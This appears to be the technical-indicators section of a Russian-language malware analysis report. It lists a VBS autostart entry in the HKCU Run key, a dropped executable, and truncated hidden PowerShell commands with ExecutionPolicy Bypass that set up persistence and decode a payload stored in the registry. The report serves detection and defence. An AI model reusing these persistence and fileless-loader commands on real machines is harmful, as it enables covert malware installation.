Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'FileName' = '%APPDATA%\wa.vbs' (параметр автозапуска: значения раздела Run выполняются при каждом входе пользователя в систему)
- %APPDATA%\wa.vbs
- %PROGRAMDATA%\mysender.exe
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\wa.vbs"
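- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'FileName' -value '%APPDATA%\wa.vbs' -PropertyType Strin... — командная строка в отчёте обрезана; видимая часть создаёт в разделе Run параметр автозапуска 'FileName', указывающий на %APPDATA%\wa.vbs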
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'FileName' -value '%APPDATA%\wa.vbs' -PropertyType Strin...' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'KeyName').KeyName;$_b=$_b.replace('~~`||','1');[byte[]]$_0 = [System.Conve...' (со скрытым окном)
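- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'KeyName').KeyName;$_b=$_b.replace('~~`||','1');[byte[]]$_0 = [System.Conve... — командная строка в отчёте обрезана; в видимой части читается значение 'KeyName' из HKCU:\SOFTWARE\Microsoft\, в нём подстрока '~~`||' заменяется на '1', а результат дальнейшего преобразования (по-видимому, декодирования) присваивается переменной типа byte[]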